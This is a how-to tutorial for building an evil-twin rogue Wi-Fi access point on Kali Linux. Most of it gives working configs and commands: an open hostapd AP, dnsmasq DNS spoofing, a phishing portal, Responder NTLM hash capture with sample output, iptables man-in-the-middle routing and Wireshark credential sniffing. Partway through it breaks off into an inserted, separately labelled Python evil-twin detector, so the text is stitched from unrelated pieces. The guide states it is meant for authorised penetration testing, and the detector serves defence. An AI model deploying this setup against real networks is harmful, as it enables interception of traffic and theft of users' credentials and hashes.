How to Create a Rogue Access Point (EvilAP) with Kali Linux for Packet Sniffing and Credential Capture
Overview
This guide walks you through the complete setup of an Evil Twin Access Point (EvilAP) using Kali Linux, hostapd, Alfa AWUS036ACH / AWUS036NHA wireless adapter, and tools like Wireshark, Responder, and iptables. This technique is commonly used by penetration testers and ethical hackers during Wi-Fi assessments to:
Capture NTLM hashes using Responder
Redirect DNS requests
Sniff cleartext credentials
Mimic a trusted Wi-Fi network (evil twin)
This guide is for educational and authorized testing purposes only. Unauthorized use is illegal.
Tools You'll Need
Kali Linux (native or VirtualBox/VMware)
Alfa USB Wi-Fi Adapter (that supports AP mode)
E.g. AWUS036ACH or AWUS036NHA
hostapd - create fake access point
dnsmasq - DNS/DHCP spoofing
Responder - capture NTLM hashes
iptables - route traffic or redirect
Wireshark or tcpdump - sniff packets
Step 1: Connect Alfa Adapter to Kali
In VirtualBox:
Go to Devices > USB > Realtek Wireless Adapter
Confirm it's passed to the VM with:
$ lsusb
Confirm the interface appears:
$ iw dev
Step 2: Enable AP Mode on Adapter
Some adapters don't support AP mode out-of-the-box. Use:
$ iw list | grep -A 10 'Supported interface modes'
Look for * AP.
If it's missing, install the AP-compatible driver:
sudo apt install realtek-rtl88xxau-dkms
Step 3: Create Virtual Interface for AP
If iw dev wlan0 set type __ap fails, try:
$ sudo iw dev wlan0 interface add ap0 type __ap
$ sudo ip link set ap0 up
Step 4: Create hostapd.conf
interface=ap0
driver=nl80211
ssid=EvilAP
hw_mode=g
channel=6
auth_algs=1
ignore_broadcast_ssid=0
wmm_enabled=0
Start it:
$ sudo hostapd hostapd.conf
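The hostapd.conf above brings up an open network (no wpa= lines) on whatever BSSID the adapter has, which is also what a defender scans for: a known SSID advertised by an unknown BSSID or without RSN/WPA. This is an added, defender-side example, not code from the guide; the BSSID inventory and the `iw dev wlan0 scan` excerpt are constructed, not captured from a real network.

```python
"""Evil-twin detector over `iw dev <iface> scan` output (added example)."""
import re

# Constructed inventory (assumption): legitimate BSSIDs per corporate SSID.
KNOWN_APS = {
    "CorpWiFi": {"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"},
}

# Constructed excerpt in the shape of `iw dev wlan0 scan` output; the
# second BSS is an open AP cloning the protected CorpWiFi SSID.
SAMPLE_SCAN = """\
BSS aa:bb:cc:00:00:01(on wlan0)
\tfreq: 2437
\tSSID: CorpWiFi
\tRSN:\t * Version: 1
BSS 00:c0:ca:11:22:33(on wlan0)
\tfreq: 2437
\tSSID: CorpWiFi
BSS aa:bb:cc:00:00:02(on wlan0)
\tfreq: 5180
\tSSID: CorpWiFi
\tRSN:\t * Version: 1
"""

def parse_scan(text):
    """Split iw scan text into dicts: bssid, ssid, freq, protected."""
    aps = []
    for block in re.split(r"^(?=BSS )", text, flags=re.M):
        m = re.match(r"BSS ([0-9a-f:]{17})", block)
        if not m:
            continue
        ssid = re.search(r"^\s*SSID: (.*)$", block, flags=re.M)
        freq = re.search(r"^\s*freq: (\d+)", block, flags=re.M)
        aps.append({
            "bssid": m.group(1),
            "ssid": ssid.group(1).strip() if ssid else "",
            "freq": int(freq.group(1)) if freq else 0,
            # RSN (WPA2/3) or WPA IE present -> network is protected
            "protected": bool(re.search(r"^\s*(RSN|WPA):", block, flags=re.M)),
        })
    return aps

def find_evil_twins(aps, known=KNOWN_APS):
    """Return (bssid, ssid, reasons) for APs that clone a known SSID."""
    findings = []
    for ap in aps:
        if ap["ssid"] not in known:
            continue
        reasons = []
        if ap["bssid"] not in known[ap["ssid"]]:
            reasons.append("unknown BSSID")
        if not ap["protected"]:
            reasons.append("no RSN/WPA")
        if reasons:
            findings.append((ap["bssid"], ap["ssid"], reasons))
    return findings

if __name__ == "__main__":
    for f in find_evil_twins(parse_scan(SAMPLE_SCAN)):
        print("ALERT evil twin candidate:", f)
```

On a real host, feed the detector the output of `iw dev wlan0 scan` and keep the inventory in sync with the WLAN controller.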
Step 5: Set Up DHCP + DNS with dnsmasq
Create dnsmasq.conf:
interface=ap0
dhcp-range=10.0.0.10,10.0.0.50,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
address=/#/10.0.0.1
Create a fake captive portal or phishing page on 10.0.0.1.
Start dnsmasq:
$ sudo dnsmasq -C dnsmasq.conf
Step 6: Redirect DNS + Capture Hashes with Responder
Start Responder:
$ sudo responder -I ap0 -wrf
This listens for:
DNS requests
WPAD auto-discovery
SMB NTLMv1/NTLMv2 hashes
HTTP Auth
Example: Triggering NTLM Hash with Fake Share Access
On the victim machine connected to EvilAP, open Run (Win + R) and enter:
\\10.0.0.1\share
If Responder is running, you should see something like:
[SMB] NTLMv2-SSP Client   : 10.0.0.12
[SMB] NTLMv2-SSP Username : VICTIM\john
[SMB] NTLMv2-SSP Hash     : john::VICTIM:112233445566778899aabbccddeeff11:0102030405060708090a0b0c0d0e0f10:::
This is a captured NTLMv2 hash, which can be cracked with tools like hashcat.
Step 7: Redirect HTTP/S Traffic (Optional MITM)
Enable packet forwarding:
echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward
Set iptables rules:
$ sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
$ sudo iptables -A FORWARD -i ap0 -o eth0 -j ACCEPT
Route victim traffic via Kali VM and capture it.
Example: UDP Port Test
To test UDP services (e.g., DNS, NetBIOS), run from another system:
nmap -sU -p 137,138,53 10.0.0.1
Use tools like tcpdump to monitor:
$ sudo tcpdump -i ap0 udp
Step 8: Sniff Traffic with Wireshark
Start capturing on ap0:
$ sudo wireshark &
Look for:
HTTP credentials
Cookies
Redirects
NTLM authentication
Unencrypted forms
Real-World Use Cases
- Wi-Fi phishing (fake login portals)
- NTLM hash capture via WPAD spoofing
- DNS redirection for malware simulation
- Testing WPA2-Enterprise bypass scenarios
- Corporate red teaming via rogue access points
Important Legal Reminder
This setup is powerful and intended only for labs, demos, and authorized penetration testing.
Unauthorized use is a crime and could lead to criminal charges.
Written by GuyIT.co.il - Ethical Hacking & Cybersecurity Tutorials